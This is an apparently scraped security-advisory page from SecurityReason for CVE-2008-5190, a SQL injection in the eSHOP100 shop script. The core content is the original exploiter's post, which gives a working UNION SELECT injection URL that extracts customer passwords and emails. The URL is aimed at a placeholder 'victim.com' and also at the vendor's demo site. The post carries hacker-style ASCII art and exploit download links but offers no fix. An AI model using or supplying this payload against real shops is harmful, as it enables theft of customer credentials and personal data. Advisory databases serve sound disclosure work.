|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4619 CVE : CVE-2008-5190 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : JuDge Published : 23.11.2008
Advisory Content : ######################################################################## # # # ...:::::eSHOP100 SQL Injection Vulnerbility ::::.... # ######################################################################## ## AUTHOR : JuDge ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com ## Script WebSite:http://www.eshop100.co.uk ##Dork::) ##DescRipTiON: pull customers info from database ##EXPLOITS: www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,pass word,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/* ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/ **/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/custo mers/* =========================================================================== ======================================================o====== ## thx to : All My FrienDs i'm Not a HaCker - ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s' - ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' ) - (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$ - ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s' - ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' - ) ( ( $$"$$$$$$$$$$$#####.$$$$$###' JuDge Da .###$$$$$$$$$$" - ( ) ) _,$" $$$$$$$$$$$$######.$$##' BeST .###$$$$$$$$$$ - ) ( ( \. "$$$$$$$$$$$$$#######,,,. ..####$$$$$$$$$$$" - ( )$ ) ) ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$" - ( ($$ ( \ _sS" `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$, - ) )$$$s ) ) . . `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"' `$$ - ( $$$Ss/ .$, .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S"" ' - \)_$$$$$$$$$$$$$$$$$$$$$$$##" $$ `$$. `$$. - `"S$$$$$$$$$$$$$$$$$#" $ `$ `$ - `"""""""""""""' ' ' ' References : http://securityreason.com/expldownload/1/4227/1 (Exploit) http://www.milw0rm.com/exploits/5970
http://secunia.com/advisories/30712  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |